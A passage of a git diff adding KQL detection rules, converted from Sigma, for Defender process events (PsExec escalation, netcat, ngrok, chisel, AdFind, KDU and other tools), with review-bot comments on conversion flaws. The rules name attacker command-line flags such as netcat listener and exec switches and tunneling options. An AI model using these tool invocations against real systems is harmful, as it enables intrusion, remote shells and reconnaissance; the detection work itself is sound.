pwsh" or ProcessCommandLine contains " –s /i pwsh" or ProcessCommandLine contains " –s –i pwsh" or ProcessCommandLine contains " –s —i pwsh" or ProcessCommandLine contains " –s ―i pwsh" or ProcessCommandLine contains " —s -i pwsh" or ProcessCommandLine contains " —s /i pwsh" or ProcessCommandLine contains " —s –i pwsh" or ProcessCommandLine contains " —s —i pwsh" or ProcessCommandLine contains " —s ―i pwsh" or ProcessCommandLine contains " ―s -i pwsh" or ProcessCommandLine contains " ―s /i pwsh" or ProcessCommandLine contains " ―s –i pwsh" or ProcessCommandLine contains " ―s —i pwsh" or ProcessCommandLine contains " ―s ―i pwsh" or ProcessCommandLine contains " -i -s pwsh" or ProcessCommandLine contains " -i /s pwsh" or ProcessCommandLine contains " -i –s pwsh" or ProcessCommandLine contains " -i —s pwsh" or ProcessCommandLine contains " -i ―s pwsh" or ProcessCommandLine contains " /i -s pwsh" or ProcessCommandLine contains " /i /s pwsh" or ProcessCommandLine contains " /i –s pwsh" or ProcessCommandLine contains " /i —s pwsh" or ProcessCommandLine contains " /i ―s pwsh" or ProcessCommandLine contains " –i -s pwsh" or ProcessCommandLine contains " –i /s pwsh" or ProcessCommandLine contains " –i –s pwsh" or ProcessCommandLine contains " –i —s pwsh" or ProcessCommandLine contains " –i ―s pwsh" or ProcessCommandLine contains " —i -s pwsh" or ProcessCommandLine contains " —i /s pwsh" or ProcessCommandLine contains " —i –s pwsh" or ProcessCommandLine contains " —i —s pwsh" or ProcessCommandLine contains " —i ―s pwsh" or ProcessCommandLine contains " ―i -s pwsh" or ProcessCommandLine contains " ―i /s pwsh" or ProcessCommandLine contains " ―i –s pwsh" or ProcessCommandLine contains " ―i —s pwsh" or ProcessCommandLine contains " ―i ―s pwsh" or ProcessCommandLine contains " -s powershell" or ProcessCommandLine contains " /s powershell" or ProcessCommandLine contains " –s powershell" or ProcessCommandLine contains " —s powershell" or ProcessCommandLine contains " ―s 
powershell" or ProcessCommandLine contains " -s -i powershell" or ProcessCommandLine contains " -s /i powershell" or ProcessCommandLine contains " -s –i powershell" or ProcessCommandLine contains " -s —i powershell" or ProcessCommandLine contains " -s ―i powershell" or ProcessCommandLine contains " /s -i powershell" or ProcessCommandLine contains " /s /i powershell" or ProcessCommandLine contains " /s –i powershell" or ProcessCommandLine contains " /s —i powershell" or ProcessCommandLine contains " /s ―i powershell" or ProcessCommandLine contains " –s -i powershell" or ProcessCommandLine contains " –s /i powershell" or ProcessCommandLine contains " –s –i powershell" or ProcessCommandLine contains " –s —i powershell" or ProcessCommandLine contains " –s ―i powershell" or ProcessCommandLine contains " —s -i powershell" or ProcessCommandLine contains " —s /i powershell" or ProcessCommandLine contains " —s –i powershell" or ProcessCommandLine contains " —s —i powershell" or ProcessCommandLine contains " —s ―i powershell" or ProcessCommandLine contains " ―s -i powershell" or ProcessCommandLine contains " ―s /i powershell" or ProcessCommandLine contains " ―s –i powershell" or ProcessCommandLine contains " ―s —i powershell" or ProcessCommandLine contains " ―s ―i powershell" or ProcessCommandLine contains " -i -s powershell" or ProcessCommandLine contains " -i /s powershell" or ProcessCommandLine contains " -i –s powershell" or ProcessCommandLine contains " -i —s powershell" or ProcessCommandLine contains " -i ―s powershell" or ProcessCommandLine contains " /i -s powershell" or ProcessCommandLine contains " /i /s powershell" or ProcessCommandLine contains " /i –s powershell" or ProcessCommandLine contains " /i —s powershell" or ProcessCommandLine contains " /i ―s powershell" or ProcessCommandLine contains " –i -s powershell" or ProcessCommandLine contains " –i /s powershell" or ProcessCommandLine contains " –i –s powershell" or ProcessCommandLine contains " –i —s 
powershell" or ProcessCommandLine contains " –i ―s powershell" or ProcessCommandLine contains " —i -s powershell" or ProcessCommandLine contains " —i /s powershell" or ProcessCommandLine contains " —i –s powershell" or ProcessCommandLine contains " —i —s powershell" or ProcessCommandLine contains " —i ―s powershell" or ProcessCommandLine contains " ―i -s powershell" or ProcessCommandLine contains " ―i /s powershell" or ProcessCommandLine contains " ―i –s powershell" or ProcessCommandLine contains " ―i —s powershell" or ProcessCommandLine contains " ―i ―s powershell")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/psexec_service_child_process_execution_as_local_system.kql b/KQL/rules/windows/process_creation/psexec_service_child_process_execution_as_local_system.kql
new file mode 100644
index 00000000..66caf128
--- /dev/null
+++ b/KQL/rules/windows/process_creation/psexec_service_child_process_execution_as_local_system.kql
@@ -0,0 +1,12 @@
+// Title: PsExec Service Child Process Execution as LOCAL SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath =~ "C:\\Windows\\PSEXESVC.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
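Review bot: The `where` clause of psexec_paexec_escalation_to_local_system.kql expands what looks like a Sigma `windash` modifier into well over a hundred `contains` alternatives (five dash variants, two flag orderings, three shells), which is impossible to review by eye and will be regenerated the same way next time. KQL `contains` is already case-insensitive, so the same match can be expressed once as a case-insensitive regular expression over the shared dash class, keeping the `psexec`/`paexec`/`accepteula` pre-filter as is: `ProcessCommandLine matches regex @"(?i) [-/–—―](s( [-/–—―]i)?|i [-/–—―]s) (cmd|pwsh|powershell)"`. The compaction belongs in the converter's windash handling rather than in this generated file; whichever form is kept, please confirm with a few sample command lines that both orderings (`-s -i` and `-i -s`) and the bare `-s` form still match. The generated query is a single very long line that the extraction has wrapped across several physical lines.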
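Review bot: `AccountName contains "AUTHORI" or AccountName contains "AUTORI"` in psexec_service_child_process_execution_as_local_system.kql will most likely never match in Defender for Endpoint, because DeviceProcessEvents splits the principal into `AccountDomain` (`nt authority`) and `AccountName` (`system`); the Sigma `User` field that carried the domain-qualified name appears to have been mapped to the wrong half. A conversion that preserves the intent is `(AccountDomain contains "AUTHORI" or AccountDomain contains "AUTORI")`; if only LOCAL SYSTEM (and not the service accounts) is wanted, `AccountSid =~ "S-1-5-18"` is the locale-independent form. Given the high severity level, a silently dead predicate should be fixed in the converter's field mapping before this lands, and the same mapping should be checked for every other rule that filters on the Sigma `User` field. Separately, the hard-coded `InitiatingProcessFolderPath =~ "C:\\Windows\\PSEXESVC.exe"` misses a renamed service executable, a known limitation inherited from the Sigma source rather than a conversion bug, and worth a one-line comment in the generated header.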
diff --git a/KQL/rules/windows/process_creation/psexec_service_execution.kql b/KQL/rules/windows/process_creation/psexec_service_execution.kql
new file mode 100644
index 00000000..0286c4be
--- /dev/null
+++ b/KQL/rules/windows/process_creation/psexec_service_execution.kql
@@ -0,0 +1,12 @@
+// Title: PsExec Service Execution
+// Author: Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)
+// Date: 2017-06-12
+// Level: medium
+// Description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate administrative tasks
+
+DeviceProcessEvents
+| where FolderPath =~ "C:\\Windows\\PSEXESVC.exe" or ProcessVersionInfoOriginalFileName =~ "psexesvc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_3proxy_execution.kql b/KQL/rules/windows/process_creation/pua_3proxy_execution.kql
new file mode 100644
index 00000000..0188a5f2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_3proxy_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - 3Proxy Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-13
+// Level: high
+// Description: Detects the use of 3proxy, a tiny free proxy server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where FolderPath endswith "\\3proxy.exe" or ProcessCommandLine contains ".exe -i127.0.0.1 -p" or ProcessVersionInfoFileDescription =~ "3proxy - tiny proxy server"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_adfind_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_adfind_suspicious_execution.kql
new file mode 100644
index 00000000..221c1c19
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_adfind_suspicious_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - AdFind Suspicious Execution
+// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community
+// Date: 2021-02-02
+// Level: high
+// Description: Detects AdFind execution with common flags seen used during attacks
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u
+// False Positives:
+// - Legitimate admin activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "domainlist" or ProcessCommandLine contains "trustdmp" or ProcessCommandLine contains "dcmodes" or ProcessCommandLine contains "adinfo" or ProcessCommandLine contains "-sc dclist" or ProcessCommandLine contains "computer_pwdnotreqd" or ProcessCommandLine contains "objectcategory=" or ProcessCommandLine contains "-subnets -f" or ProcessCommandLine contains "name=\"Domain Admins\"" or ProcessCommandLine contains "-sc u:" or ProcessCommandLine contains "domainncs" or ProcessCommandLine contains "dompol" or ProcessCommandLine contains " oudmp " or ProcessCommandLine contains "subnetdmp" or ProcessCommandLine contains "gpodmp" or ProcessCommandLine contains "fspdmp" or ProcessCommandLine contains "users_noexpire" or ProcessCommandLine contains "computers_active" or ProcessCommandLine contains "computers_pwdnotreqd"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_adidnsdump_execution.kql b/KQL/rules/windows/process_creation/pua_adidnsdump_execution.kql
new file mode 100644
index 00000000..7d6c2ec6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_adidnsdump_execution.kql
@@ -0,0 +1,11 @@
+// Title: PUA - Adidnsdump Execution
+// Author: frack113
+// Date: 2022-01-01
+// Level: low
+// Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,
+// Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "adidnsdump" and FolderPath endswith "\\python.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_advanced_ip_scanner_execution.kql b/KQL/rules/windows/process_creation/pua_advanced_ip_scanner_execution.kql
new file mode 100644
index 00000000..4a0403e9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_advanced_ip_scanner_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Advanced IP Scanner Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy
+// Date: 2020-05-12
+// Level: medium
+// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046, attack.t1135
+// False Positives:
+// - Legitimate administrative use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_ip_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_ip_scanner" or ProcessVersionInfoFileDescription contains "Advanced IP Scanner")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_advanced_port_scanner_execution.kql b/KQL/rules/windows/process_creation/pua_advanced_port_scanner_execution.kql
new file mode 100644
index 00000000..87166d63
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_advanced_port_scanner_execution.kql
@@ -0,0 +1,13 @@
+// Title: PUA - Advanced Port Scanner Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-18
+// Level: medium
+// Description: Detects the use of Advanced Port Scanner.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046, attack.t1135
+// False Positives:
+// - Legitimate administrative use
+// - Tools with similar commandline (very rare)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_port_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_port_scanner" or ProcessVersionInfoFileDescription contains "Advanced Port Scanner")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_advancedrun_execution.kql b/KQL/rules/windows/process_creation/pua_advancedrun_execution.kql
new file mode 100644
index 00000000..5f4e73f9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_advancedrun_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - AdvancedRun Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-20
+// Level: medium
+// Description: Detects the execution of AdvancedRun utility
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_advancedrun_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_advancedrun_suspicious_execution.kql
new file mode 100644
index 00000000..f40389f8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_advancedrun_suspicious_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - AdvancedRun Suspicious Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-20
+// Level: high
+// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/EXEFilename" or ProcessCommandLine contains "/CommandLine") and ((ProcessCommandLine contains " /RunAs 8 " or ProcessCommandLine contains " /RunAs 4 " or ProcessCommandLine contains " /RunAs 10 " or ProcessCommandLine contains " /RunAs 11 ") or (ProcessCommandLine endswith "/RunAs 8" or ProcessCommandLine endswith "/RunAs 4" or ProcessCommandLine endswith "/RunAs 10" or ProcessCommandLine endswith "/RunAs 11"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_chisel_tunneling_tool_execution.kql b/KQL/rules/windows/process_creation/pua_chisel_tunneling_tool_execution.kql
new file mode 100644
index 00000000..42b48bb0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_chisel_tunneling_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Chisel Tunneling Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-13
+// Level: high
+// Description: Detects usage of the Chisel tunneling tool via the commandline arguments
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.001
+// False Positives:
+// - Some false positives may occur with other tools with similar commandlines
+
+DeviceProcessEvents
+| where FolderPath endswith "\\chisel.exe" or ((ProcessCommandLine contains "exe client " or ProcessCommandLine contains "exe server ") and (ProcessCommandLine contains "-socks5" or ProcessCommandLine contains "-reverse" or ProcessCommandLine contains " r:" or ProcessCommandLine contains ":127.0.0.1:" or ProcessCommandLine contains "-tls-skip-verify " or ProcessCommandLine contains ":socks"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_cleanwipe_execution.kql b/KQL/rules/windows/process_creation/pua_cleanwipe_execution.kql
new file mode 100644
index 00000000..30b17c8e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_cleanwipe_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - CleanWipe Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-18
+// Level: high
+// Description: Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate administrative use (Should be investigated either way)
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SepRemovalToolNative_x64.exe" or (ProcessCommandLine contains "--uninstall" and FolderPath endswith "\\CATClean.exe") or (ProcessCommandLine contains "-r" and FolderPath endswith "\\NetInstaller.exe") or ((ProcessCommandLine contains "/uninstall" and ProcessCommandLine contains "/enterprise") and FolderPath endswith "\\WFPUnins.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_crassus_execution.kql b/KQL/rules/windows/process_creation/pua_crassus_execution.kql
new file mode 100644
index 00000000..9c3168fe
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_crassus_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Crassus Execution
+// Author: pH-T (Nextron Systems)
+// Date: 2023-04-17
+// Level: high
+// Description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.reconnaissance, attack.t1590.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Crassus.exe" or ProcessVersionInfoOriginalFileName =~ "Crassus.exe" or ProcessVersionInfoFileDescription contains "Crassus"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_csexec_execution.kql b/KQL/rules/windows/process_creation/pua_csexec_execution.kql
new file mode 100644
index 00000000..c48bd7b9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_csexec_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - CsExec Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-22
+// Level: high
+// Description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001, attack.execution, attack.t1569.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\csexec.exe" or ProcessVersionInfoFileDescription =~ "csexec"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_defendercheck_execution.kql b/KQL/rules/windows/process_creation/pua_defendercheck_execution.kql
new file mode 100644
index 00000000..2cccb8ec
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_defendercheck_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - DefenderCheck Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-30
+// Level: high
+// Description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.005
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\DefenderCheck.exe" or ProcessVersionInfoFileDescription =~ "DefenderCheck"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_dit_snapshot_viewer.kql b/KQL/rules/windows/process_creation/pua_dit_snapshot_viewer.kql
new file mode 100644
index 00000000..e721b309
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_dit_snapshot_viewer.kql
@@ -0,0 +1,12 @@
+// Title: PUA - DIT Snapshot Viewer
+// Author: Furkan Caliskan (@caliskanfurkan_)
+// Date: 2020-07-04
+// Level: high
+// Description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+// False Positives:
+// - Legitimate admin usage
+
+DeviceProcessEvents
+| where FolderPath endswith "\\ditsnap.exe" or ProcessCommandLine contains "ditsnap.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_fast_reverse_proxy_frp_execution.kql b/KQL/rules/windows/process_creation/pua_fast_reverse_proxy_frp_execution.kql
new file mode 100644
index 00000000..0ede4f6b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_fast_reverse_proxy_frp_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Fast Reverse Proxy (FRP) Execution
+// Author: frack113, Florian Roth
+// Date: 2022-09-02
+// Level: high
+// Description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\frpc.ini" or (MD5 startswith "7D9C233B8C9E3F0EA290D2B84593C842" or SHA1 startswith "06DDC9280E1F1810677935A2477012960905942F" or SHA256 startswith "57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C") or (FolderPath endswith "\\frpc.exe" or FolderPath endswith "\\frps.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_iox_tunneling_tool_execution.kql b/KQL/rules/windows/process_creation/pua_iox_tunneling_tool_execution.kql
new file mode 100644
index 00000000..f792faa5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_iox_tunneling_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA- IOX Tunneling Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-08
+// Level: high
+// Description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where FolderPath endswith "\\iox.exe" or (ProcessCommandLine contains ".exe fwd -l " or ProcessCommandLine contains ".exe fwd -r " or ProcessCommandLine contains ".exe proxy -l " or ProcessCommandLine contains ".exe proxy -r ") or (MD5 startswith "9DB2D314DD3F704A02051EF5EA210993" or SHA1 startswith "039130337E28A6623ECF9A0A3DA7D92C5964D8DD" or SHA256 startswith "C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731")
\ No newline at end of file
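Review bot: The hash predicates in pua_fast_reverse_proxy_frp_execution.kql — `MD5 startswith "…" or SHA1 startswith "…" or SHA256 startswith "…"` — use a prefix operator on what are full-length digests, so they read as if partial hashes were intended and would silently widen if a truncated hash ever reached the source rule; `=~` (or `in~` for a list) states the intent exactly. The same shape appears in pua_iox_tunneling_tool_execution.kql and pua_nimgrab_execution.kql, so the change belongs in the converter's mapping for what is presumably the Sigma `Hashes` selection rather than in the generated files. Hash clauses only ever cover the specific builds listed, since a rebuilt binary changes all three digests, so the `FolderPath`/`ProcessCommandLine` alternatives in the same `where` are what carry the detection in practice; a header line such as `// NOTE: the hash clauses match only the builds listed in the Sigma source; the path and command-line clauses carry the detection` would save the next reader from over-trusting them.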
diff --git a/KQL/rules/windows/process_creation/pua_kernel_driver_utility_kdu_execution.kql b/KQL/rules/windows/process_creation/pua_kernel_driver_utility_kdu_execution.kql
new file mode 100644
index 00000000..c7b2e1eb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_kernel_driver_utility_kdu_execution.kql
@@ -0,0 +1,14 @@
+// Title: PUA - Kernel Driver Utility (KDU) Execution
+// Author: Matt Anderson, Dray Agha, Anna Pham (Huntress)
+// Date: 2026-01-02
+// Level: high
+// Description: Detects execution of the Kernel Driver Utility (KDU) tool.
+// KDU can be used to bypass driver signature enforcement and load unsigned or malicious drivers into the Windows kernel.
+// Potentially allowing for privilege escalation, persistence, or evasion of security controls.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Legitimate driver development, testing, or administrative troubleshooting (e.g., enabling/disabling hardware)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-map " or ProcessCommandLine contains "-prv " or ProcessCommandLine contains "-dse " or ProcessCommandLine contains "-ps ") and ((FolderPath endswith "\\kdu.exe" or FolderPath endswith "\\hamakaze.exe") or ProcessVersionInfoOriginalFileName =~ "hamakaze.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_mouse_lock_execution.kql b/KQL/rules/windows/process_creation/pua_mouse_lock_execution.kql
new file mode 100644
index 00000000..f0a29b3f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_mouse_lock_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Mouse Lock Execution
+// Author: Cian Heasley
+// Date: 2020-08-13
+// Level: medium
+// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.collection, attack.t1056.002
+// False Positives:
+// - Legitimate uses of Mouse Lock software
+
+DeviceProcessEvents
+| where ProcessVersionInfoProductName contains "Mouse Lock" or ProcessVersionInfoCompanyName contains "Misc314" or ProcessCommandLine contains "Mouse Lock_"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_netcat_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_netcat_suspicious_execution.kql
new file mode 100644
index 00000000..4aa48ba4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_netcat_suspicious_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Netcat Suspicious Execution
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2021-07-21
+// Level: high
+// Description: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1095
+// False Positives:
+// - Legitimate ncat use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -lvp " or ProcessCommandLine contains " -lvnp" or ProcessCommandLine contains " -l -v -p " or ProcessCommandLine contains " -lv -p " or ProcessCommandLine contains " -l --proxy-type http " or ProcessCommandLine contains " -vnl --exec " or ProcessCommandLine contains " -vnl -e " or ProcessCommandLine contains " --lua-exec " or ProcessCommandLine contains " --sh-exec ") or (FolderPath endswith "\\nc.exe" or FolderPath endswith "\\ncat.exe" or FolderPath endswith "\\netcat.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_ngrok_execution.kql b/KQL/rules/windows/process_creation/pua_ngrok_execution.kql
new file mode 100644
index 00000000..0be978cd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_ngrok_execution.kql
@@ -0,0 +1,14 @@
+// Title: PUA - Ngrok Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-14
+// Level: high
+// Description: Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.
+// Involved domains are bin.equinox.io for download and *.ngrok.io for connections.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+// False Positives:
+// - Another tool that uses the command line switches of Ngrok
+// - Ngrok http 3978 (https://learn.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " tcp 139" or ProcessCommandLine contains " tcp 445" or ProcessCommandLine contains " tcp 3389" or ProcessCommandLine contains " tcp 5985" or ProcessCommandLine contains " tcp 5986") or (ProcessCommandLine contains " start " and ProcessCommandLine contains "--all" and ProcessCommandLine contains "--config" and ProcessCommandLine contains ".yml") or ((ProcessCommandLine contains " tcp " or ProcessCommandLine contains " http " or ProcessCommandLine contains " authtoken ") and FolderPath endswith "ngrok.exe") or (ProcessCommandLine contains ".exe authtoken " or ProcessCommandLine contains ".exe start --all")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_nimgrab_execution.kql b/KQL/rules/windows/process_creation/pua_nimgrab_execution.kql
new file mode 100644
index 00000000..b373859a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_nimgrab_execution.kql
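Review bot: `FolderPath endswith "ngrok.exe"` in pua_ngrok_execution.kql lacks the leading `\\` that every sibling rule uses (`"\\nc.exe"`, `"\\chisel.exe"`, …), so it also matches any image whose file name merely ends in `ngrok.exe`. That may be deliberate in the Sigma source, to catch renamed copies that keep the suffix, but if so the generated file should say so, e.g. `// NOTE: endswith "ngrok.exe" without a path separator is intentionally loose, to match renamed builds`; if not, `FolderPath endswith "\\ngrok.exe"` brings it in line with the other rules. Either way the clause only fires together with the ` tcp `/` http `/` authtoken ` command-line test, so the practical false-positive impact is small and this is mostly a consistency point for the converter output.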
@@ -0,0 +1,12 @@
+// Title: PUA - Nimgrab Execution
+// Author: frack113
+// Date: 2022-08-28
+// Level: high
+// Description: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate use of Nim on a developer systems
+
+DeviceProcessEvents
+| where (MD5 startswith "2DD44C3C29D667F5C0EF5F9D7C7FFB8B" or SHA256 startswith "F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559") or FolderPath endswith "\\nimgrab.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_nircmd_execution.kql b/KQL/rules/windows/process_creation/pua_nircmd_execution.kql
new file mode 100644
index 00000000..da609a4d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_nircmd_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - NirCmd Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-24
+// Level: medium
+// Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+// - Legitimate use by administrators
+
+DeviceProcessEvents
